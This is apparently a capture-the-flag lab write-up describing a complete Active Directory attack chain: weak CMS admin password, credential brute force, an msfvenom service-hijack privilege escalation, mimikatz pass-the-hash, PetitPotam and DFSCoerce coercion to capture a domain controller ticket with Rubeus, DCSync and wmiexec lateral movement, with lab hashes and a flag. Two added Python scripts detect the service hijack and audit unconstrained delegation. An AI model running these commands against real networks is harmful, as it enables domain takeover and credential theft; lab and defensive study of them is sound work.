春秋云境-Delegation

Learning points

172.22.4.36   localhost                 external-facing CmsEasy (易通 CMS) web server
172.22.4.45   WIN19.xiaorang.lab        host configured with unconstrained delegation
172.22.4.19   FILESERVER.xiaorang.lab   file server
172.22.4.7    DC01.xiaorang.lab         domain controller

cmseasy

Weak password admin/123456 for the admin panel; get a shell from the backend, then escalate via a SUID binary to read the flag file.

/home/flag/ >diff --line-format=%L /dev/null flag01.txt
____ U _____ u _ U _____ u ____ _ _____ U ___ u _ _
| _"\ \| ___"|/ |"| \| ___"|/U /"___|uU /"\ u |_ " _| ___ \/"_ \/ | \ |"|
/| | | | | _|" U | | u | _|" \| | _ / \/ _ \/ | | |_"_| | | | |<| \| |>
U| |_| |\| |___ \| |/__ | |___ | |_| | / ___ \ /| |\ | | .-,_| |_| |U| |\ |u
|____/ u|_____| |_____| |_____| \____| /_/ \_\ u |_|U U/| |\u\_)-\___/ |_| \_|
|||_ << >> // \\ << >> _)(|_ \\ >> _// \\_.-,_|___|_,-. \\ || \\,-.
(__)_) (__) (__)(_")("_)(__) (__) (__)__) (__) (__)(__) (__)\_)-' '-(_/ (__) (_") (_/

flag01: flag{cfb91c90-a38a-4419-a974-ad32415fccd3}

Great job!!!!!!

Here is the hint: WIN19\Adrian

I'll do whatever I can to rock you...

fscan

172.22.4.45:445 open
172.22.4.19:445 open
172.22.4.7:445 open
172.22.4.45:139 open
172.22.4.7:139 open
172.22.4.19:139 open
172.22.4.45:135 open
172.22.4.7:135 open
172.22.4.19:135 open
172.22.4.45:80 open
172.22.4.36:80 open
172.22.4.7:88 open
172.22.4.36:22 open
172.22.4.36:21 open
172.22.4.36:3306 open
[*] NetInfo
[*]172.22.4.7
[->]DC01
[->]172.22.4.7
[*] NetInfo
[*]172.22.4.45
[->]WIN19
[->]172.22.4.45
[*] NetInfo
[*]172.22.4.19
[->]FILESERVER
[->]172.22.4.19
[*] NetBios 172.22.4.19 FILESERVER.xiaorang.lab Windows Server 2016 Standard 14393
[*] NetBios 172.22.4.45 XIAORANG\WIN19
[*] NetBios 172.22.4.7 [+] DC:DC01.xiaorang.lab Windows Server 2016 Datacenter 14393
[*] OsInfo 172.22.4.7 (Windows Server 2016 Datacenter 14393)
[*] WebTitle http://172.22.4.36 code:200 len:0 title:None
[*] WebTitle http://172.22.4.45 code:200 len:703 title:IIS Windows Server

Password brute force

proxychains4 -q crackmapexec smb 172.22.4.45 -u Adrian -p pass.txt --local-auth

The password is babygirl1, but it has expired, so it must be changed remotely.

Using impacket fails:

$ proxychains4 -q impacket-changepasswd WIN19/Adrian:'babygirl1'@172.22.4.45 -newpass 'Admin@123456'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Changing the password of WIN19\Adrian
[*] Connecting to DCE/RPC as WIN19\Adrian
[!] Password is expired or must be changed, trying to bind with a null session.
[*] Connecting to DCE/RPC as null session
Traceback (most recent call last):
File "/usr/lib/python3/dist-packages/impacket/smbconnection.py", line 280, in login
return self._SMBConnection.login(user, password, domain, lmhash, nthash)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3/dist-packages/impacket/smb3.py", line 1091, in login
if packet.isValidAnswer(STATUS_SUCCESS):
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3/dist-packages/impacket/smb3structs.py", line 460, in isValidAnswer
raise smb3.SessionError(self['Status'], self)
impacket.smb3.SessionError: SMB SessionError: STATUS_PASSWORD_EXPIRED(The user account password has expired.)

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
File "/usr/share/doc/python3-impacket/examples/changepasswd.py", line 392, in connect
self.dce = self.authenticate(anonymous=False)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/share/doc/python3-impacket/examples/changepasswd.py", line 371, in authenticate
dce.connect()
File "/usr/lib/python3/dist-packages/impacket/dcerpc/v5/rpcrt.py", line 805, in connect
return self._transport.connect()
^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3/dist-packages/impacket/dcerpc/v5/transport.py", line 514, in connect
self.__smb_connection.login(self._username, self._password, self._domain, self._lmhash, self._nthash)
File "/usr/lib/python3/dist-packages/impacket/smbconnection.py", line 282, in login
raise SessionError(e.get_error_code(), e.get_error_packet())
impacket.smbconnection.SessionError: SMB SessionError: code: 0xc0000071 - STATUS_PASSWORD_EXPIRED - The user account password has expired.

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
File "/usr/lib/python3/dist-packages/impacket/smbconnection.py", line 280, in login
return self._SMBConnection.login(user, password, domain, lmhash, nthash)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3/dist-packages/impacket/smb3.py", line 1091, in login
if packet.isValidAnswer(STATUS_SUCCESS):
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3/dist-packages/impacket/smb3structs.py", line 460, in isValidAnswer
raise smb3.SessionError(self['Status'], self)
impacket.smb3.SessionError: SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
File "/usr/share/doc/python3-impacket/examples/changepasswd.py", line 960, in <module>
handler.changePassword(
File "/usr/share/doc/python3-impacket/examples/changepasswd.py", line 225, in changePassword
return self._changePassword(
^^^^^^^^^^^^^^^^^^^^^
File "/usr/share/doc/python3-impacket/examples/changepasswd.py", line 530, in _changePassword
if not self.connect(retry_if_expired=True):
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/share/doc/python3-impacket/examples/changepasswd.py", line 398, in connect
self.dce = self.authenticate(anonymous=True)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/share/doc/python3-impacket/examples/changepasswd.py", line 371, in authenticate
dce.connect()
File "/usr/lib/python3/dist-packages/impacket/dcerpc/v5/rpcrt.py", line 805, in connect
return self._transport.connect()
^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3/dist-packages/impacket/dcerpc/v5/transport.py", line 514, in connect
self.__smb_connection.login(self._username, self._password, self._domain, self._lmhash, self._nthash)
File "/usr/lib/python3/dist-packages/impacket/smbconnection.py", line 282, in login
raise SessionError(e.get_error_code(), e.get_error_packet())
impacket.smbconnection.SessionError: SMB SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights.

Change the password to Admin@123 over RDP instead

rdesktop 172.22.4.45 -d WIN19 -u Adrian -p babygirl1 -z

Registry privilege escalation

A privilege-escalation check script shows that the registry path of the gupdate service, which runs as SYSTEM, is writable by the current user.

powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck -Extended -Report PrivescCheck_$($env:COMPUTERNAME) -Format TXT,HTML"

Name              : gupdate
ImagePath         : "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /svc
User              : LocalSystem
ModifiablePath    : HKLM\SYSTEM\CurrentControlSet\Services\gupdate
IdentityReference : NT AUTHORITY\Authenticated Users
Permissions       : WriteDAC, Notify, ReadControl, CreateLink, EnumerateSubKeys, WriteOwner, Delete, CreateSubKey, SetValue, QueryValue
Status            : Stopped
UserCanStart      : True
UserCanStop       : True

Name              : gupdate
ImagePath         : "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /svc
User              : LocalSystem
ModifiablePath    : HKLM\SYSTEM\CurrentControlSet\Services\gupdate
IdentityReference : BUILTIN\Users
Permissions       : WriteDAC, Notify, ReadControl, CreateLink, EnumerateSubKeys, WriteOwner, Delete, CreateSubKey, SetValue, QueryValue
Status            : Stopped
UserCanStart      : True
UserCanStop       : True

Name              : Spooler
ImagePath         : C:\Windows\System32\spoolsv.exe
User              : LocalSystem
ModifiablePath    : HKLM\SYSTEM\CurrentControlSet\Services\Spooler
IdentityReference : NT AUTHORITY\Authenticated Users
Permissions       : ReadControl, EnumerateSubKeys, WriteOwner, CreateSubKey, QueryValue
Status            : Running
UserCanStart      : False
UserCanStop       : False

Generate an exe with msfvenom that executes a.bat

msfvenom -p windows/x64/exec cmd='C:\windows\system32\cmd.exe /c C:\Users\Public\Downloads\a.bat ' --platform windows -f exe-service > a.exe

a.bat

net localgroup administrators Adrian /add

Change the service binary path

# change the service binary
reg add "HKLM\SYSTEM\CurrentControlSet\Services\gupdate" /t REG_EXPAND_SZ /v ImagePath /d "C:\Users\Public\Downloads\a.exe" /f
# query the value
reg query "HKLM\SYSTEM\CurrentControlSet\Services\gupdate" /v ImagePath
# start the service
sc start gupdate
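
Detection view of the service-hijack step above, added here as an example and not part of the original writeup. It is a small Python checker that (a) triages a PrivescCheck "Permissions" string for the rights that actually let a caller redirect what a service runs, and (b) scans Sysmon Event ID 13 (RegistryEvent, value set) records for ImagePath writes under HKLM\SYSTEM\CurrentControlSet\Services that were made by a non-SYSTEM principal or point outside the Windows and Program Files directories. The event records are constructed for this example (field names follow Sysmon's schema); the trusted-directory list and the writer allowlist are assumptions to tune per environment.

```python
import re

# Rights on a service's registry key that let the holder change what the service
# executes: write ImagePath directly, or take ownership / rewrite the DACL and then write it.
HIJACK_RIGHTS = {"SetValue", "CreateSubKey", "Delete", "WriteDAC", "WriteOwner", "FullControl"}

# Where service binaries are expected to live (assumption: tune per environment).
TRUSTED_PREFIXES = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")

# Principals that legitimately rewrite service configuration (assumption: tune per environment).
PRIVILEGED_WRITERS = {"nt authority\\system", "nt service\\trustedinstaller"}

# Matches ...\Services\<name>\ImagePath regardless of how the hive is spelled.
IMAGEPATH_RE = re.compile(r"\\services\\([^\\]+)\\imagepath$", re.IGNORECASE)

# Sysmon Event ID 13 (RegistryEvent, Value Set) records reduced to the fields used here.
# CONSTRUCTED for this example; the values mirror the PrivescCheck output and the reg add above.
SAMPLE_EVENTS = [
    {"EventID": 13, "User": "NT AUTHORITY\\SYSTEM", "Image": "C:\\Windows\\System32\\services.exe",
     "TargetObject": "HKLM\\System\\CurrentControlSet\\Services\\Spooler\\ImagePath",
     "Details": "C:\\Windows\\System32\\spoolsv.exe"},
    {"EventID": 13, "User": "NT AUTHORITY\\SYSTEM",
     "Image": "C:\\Program Files (x86)\\Google\\Update\\GoogleUpdate.exe",
     "TargetObject": "HKLM\\System\\CurrentControlSet\\Services\\gupdate\\ImagePath",
     "Details": "\"C:\\Program Files (x86)\\Google\\Update\\GoogleUpdate.exe\" /svc"},
    {"EventID": 13, "User": "WIN19\\Adrian", "Image": "C:\\Windows\\System32\\reg.exe",
     "TargetObject": "HKLM\\System\\CurrentControlSet\\Services\\gupdate\\ImagePath",
     "Details": "C:\\Users\\Public\\Downloads\\a.exe"},
    {"EventID": 12, "User": "WIN19\\Adrian", "Image": "C:\\Windows\\System32\\reg.exe",
     "TargetObject": "HKLM\\System\\CurrentControlSet\\Services\\gupdate", "Details": ""},
]


def hijackable_rights(permissions):
    """Subset of a PrivescCheck 'Permissions' string that allows redirecting the service."""
    granted = {p.strip() for p in permissions.split(",")}
    return sorted(HIJACK_RIGHTS & granted)


def service_name(target_object):
    """Service whose ImagePath value this registry path refers to, or None."""
    m = IMAGEPATH_RE.search(target_object)
    return m.group(1) if m else None


def binary_path(details):
    """Executable part of an ImagePath value, e.g. '"C:\\a b\\x.exe" /svc' -> 'C:\\a b\\x.exe'."""
    value = details.strip()
    if value.startswith('"'):
        end = value.find('"', 1)
        return value[1:end] if end > 0 else value[1:]
    return value.split(" ", 1)[0]


def check_event(event):
    """Reasons an ImagePath write looks like a hijack; empty list when it looks benign."""
    if event.get("EventID") != 13 or service_name(event.get("TargetObject", "")) is None:
        return []
    reasons = []
    user = event.get("User", "")
    if user.lower() not in PRIVILEGED_WRITERS:
        reasons.append("ImagePath written by non-system principal %s" % user)
    path = binary_path(event.get("Details", ""))
    if not path.lower().startswith(TRUSTED_PREFIXES):
        reasons.append("service binary outside trusted directories: %s" % path)
    return reasons


def detect(events):
    """Alerts (service, user, reasons) for every suspicious ImagePath write in the stream."""
    alerts = []
    for event in events:
        reasons = check_event(event)
        if reasons:
            alerts.append({"service": service_name(event["TargetObject"]),
                           "user": event.get("User", ""), "reasons": reasons})
    return alerts


if __name__ == "__main__":
    print("gupdate key rights that allow hijack:",
          hijackable_rights("WriteDAC, Notify, ReadControl, CreateLink, EnumerateSubKeys, "
                            "WriteOwner, Delete, CreateSubKey, SetValue, QueryValue"))
    for alert in detect(SAMPLE_EVENTS):
        print("ALERT service=%(service)s user=%(user)s" % alert)
        for reason in alert["reasons"]:
            print("   -", reason)
```

Run as a script it raises one alert, for the gupdate write made by WIN19\Adrian with a binary under C:\Users\Public\Downloads, and stays quiet for the Spooler and GoogleUpdate values written by SYSTEM. The underlying finding is fixed on the key's DACL: Users and Authenticated Users should hold only read rights on a service key, not SetValue, CreateSubKey, Delete, WriteDAC or WriteOwner.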

flag02

Information gathering

After escalating, dump the machine account hash from the registry and use pass-the-hash for domain enumeration.

WIN19$:aad3b435b51404eeaad3b435b51404ee:c38ca39606871db61c1389b0fbedf381

PTH with the machine account hash

mimikatz.exe "privilege::debug" "sekurlsa::pth /user:WIN19$ /domain:xiaorang.lab /ntlm:c38ca39606871db61c1389b0fbedf381" exit

Delegation enumeration

Running AdFind locally on WIN19 shows directly that the current machine is configured for unconstrained delegation.

C:\Users\Public\Downloads>AdFind.exe -b "DC=xiaorang,DC=lab" -f "(&(samAccountType=805306369)(userAccountControl:1.2.840.113556.1.4.803:=524288))" -dn

AdFind V01.62.00cpp Joe Richards ([email protected]) October 2023

Using server: DC01.xiaorang.lab:389
Directory: Windows Server 2016

dn:CN=DC01,OU=Domain Controllers,DC=xiaorang,DC=lab
dn:CN=WIN19,CN=Computers,DC=xiaorang,DC=lab

2 Objects returned

Remotely, impacket can be used:

impacket-findDelegation xiaorang.lab/'WIN19$' -hashes :c38ca39606871db61c1389b0fbedf381 -dc-ip 172.22.4.7 

Remotely, adinfo can also be used:

Adinfo_win.exe -d xiaorang.lab --dc 172.22.4.7 -u WIN19$ -H c38ca39606871db61c1389b0fbedf381 --checkbackdoor

On Windows it works fine through the proxy; on Linux it seems to have a bug and returns access denied.

So all that remains is to coerce the domain controller into authenticating!
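
The AdFind filter above works because userAccountControl is a bit field and 524288 is the TRUSTED_FOR_DELEGATION bit. The following Python, added here as an example and not part of the original writeup, decodes the delegation-relevant bits, rebuilds the same LDAP filter, and audits a set of computer accounts the way a defender would: domain controllers carry the bit by design, any other host holding it is a finding, and the corrected userAccountControl is the value with the bit cleared. Bit values are from Microsoft's documentation of the attribute; the sample userAccountControl values for the three lab hosts are constructed.

```python
# userAccountControl bits that govern Kerberos delegation. Values are from Microsoft's
# documentation of the attribute; 524288 in the AdFind filter above is TRUSTED_FOR_DELEGATION.
WORKSTATION_TRUST_ACCOUNT = 0x1000
SERVER_TRUST_ACCOUNT = 0x2000               # set on domain controller accounts
TRUSTED_FOR_DELEGATION = 0x80000            # unconstrained delegation (decimal 524288)
NOT_DELEGATED = 0x100000                    # "account is sensitive and cannot be delegated"
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # constrained delegation with protocol transition

FLAG_NAMES = {
    WORKSTATION_TRUST_ACCOUNT: "WORKSTATION_TRUST_ACCOUNT",
    SERVER_TRUST_ACCOUNT: "SERVER_TRUST_ACCOUNT",
    TRUSTED_FOR_DELEGATION: "TRUSTED_FOR_DELEGATION",
    NOT_DELEGATED: "NOT_DELEGATED",
    TRUSTED_TO_AUTH_FOR_DELEGATION: "TRUSTED_TO_AUTH_FOR_DELEGATION",
}

# LDAP extensible-match rule for bitwise AND: the ":1.2.840.113556.1.4.803:=" in the filter above.
LDAP_MATCHING_RULE_BIT_AND = "1.2.840.113556.1.4.803"
SAM_ACCOUNT_TYPE_COMPUTER = 805306369       # samAccountType of machine accounts


def ldap_filter_unconstrained():
    """Rebuild the AdFind filter: computer objects whose userAccountControl has the unconstrained bit."""
    return "(&(samAccountType=%d)(userAccountControl:%s:=%d))" % (
        SAM_ACCOUNT_TYPE_COMPUTER, LDAP_MATCHING_RULE_BIT_AND, TRUSTED_FOR_DELEGATION)


def describe(uac):
    """Names of the delegation-relevant flags set in a userAccountControl value."""
    return [name for bit, name in sorted(FLAG_NAMES.items()) if uac & bit]


def has_unconstrained_delegation(uac):
    return bool(uac & TRUSTED_FOR_DELEGATION)


def is_domain_controller(uac):
    return bool(uac & SERVER_TRUST_ACCOUNT)


def audit(computers):
    """Names of non-DC computers trusted for unconstrained delegation.

    Domain controllers carry the bit by design. Any other host holding it receives and can
    reuse the TGT of every account that authenticates to it, which is what the coercion step
    in this writeup exploits.
    """
    return sorted(name for name, uac in computers.items()
                  if has_unconstrained_delegation(uac) and not is_domain_controller(uac))


def remediated_uac(uac):
    """userAccountControl to write back when clearing a finding (unconstrained bit removed)."""
    return uac & ~TRUSTED_FOR_DELEGATION


def protect_sensitive_account(uac):
    """Mark an account sensitive so its TGT is never forwarded to a delegating host."""
    return uac | NOT_DELEGATED


# CONSTRUCTED values mirroring the three lab hosts: only DC01 should legitimately carry the bit.
SAMPLE_COMPUTERS = {
    "DC01$": SERVER_TRUST_ACCOUNT | TRUSTED_FOR_DELEGATION,        # 532480
    "WIN19$": WORKSTATION_TRUST_ACCOUNT | TRUSTED_FOR_DELEGATION,  # 528384
    "FILESERVER$": WORKSTATION_TRUST_ACCOUNT,                      # 4096
}

if __name__ == "__main__":
    print("filter:", ldap_filter_unconstrained())
    for name, uac in SAMPLE_COMPUTERS.items():
        print("%-12s %8d %s" % (name, uac, ", ".join(describe(uac))))
    for name in audit(SAMPLE_COMPUTERS):
        print("FINDING: %s is trusted for unconstrained delegation; corrected UAC = %d"
              % (name, remediated_uac(SAMPLE_COMPUTERS[name])))
```

Against the sample data the audit reports only WIN19$, which is exactly the object the writeup's AdFind query returned alongside DC01. Clearing the bit on WIN19$ removes the capture path entirely; setting NOT_DELEGATED on privileged accounts (or placing them in the Protected Users group, which has the same effect) limits the damage where a delegating host has to stay.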

Unconstrained delegation + NTLM coerced authentication

Use PrinterBug, PetitPotam, DFSCoerce, etc. to force the domain controller to authenticate.

PetitPotam can be triggered anonymously in older 2008/2012 environments: three of the anonymously accessible named pipes are netlogon, samr and lsarpc.

impacket-PetitPotam WIN7.test.com 192.168.100.128

proxychains4 -q impacket-PetitPotam -u 'WIN19$' -hashes :c38ca39.. -d xiaorang.lab -dc-ip 172.22.4.7 WIN19.xiaorang.lab 172.22.4.7

proxychains4 -q impacket-dfscoerce -u 'WIN19$' -hashes :c38ca39.. -d xiaorang.lab -dc-ip 172.22.4.7 WIN19.xiaorang.lab 172.22.4.7

Start Rubeus in monitor mode and capture the TGT of the domain controller's machine account

Rubeus-net47.exe monitor /interval:3 /targetuser:DC01$ /nowrap

Attacking the domain controller

Import the ticket on Kali and run DCSync

# convert the ticket
echo 'doIFlDCCBZCg..' | base64 -d > DC.kirbi
impacket-ticketConverter DC.kirbi DC.ccache

# import the ticket
export KRB5CCNAME=DC.ccache

# view the ticket
klist

# secretsdump
correct: impacket-secretsdump -k -no-pass 'DC-1$'@DC-1.test.com -dc-ip 192.168.100.128
wrong:   impacket-secretsdump xiaorang.lab/[email protected] -just-dc-ntlm -k -no-pass

The imported ticket can be seen to be a TGT (a ticket for the krbtgt service).

Rubeus + mimikatz also works

Rubeus.exe ptt /ticket:doIFlDC...
klist
mimikatz.exe "lsadump::dcsync /domain:xiaorang.lab /all /csv" exit

PTH to the domain controller and the other host

proxychains4 -q impacket-wmiexec xiaorang.lab/[email protected] -hashes :4889f6553239ace1f7c47fa2c619c252 -codec GBK -shell-type powershell

proxychains4 -q impacket-wmiexec xiaorang.lab/[email protected] -hashes :4889f6553239ace1f7c47fa2c619c252 -codec GBK -shell-type powershell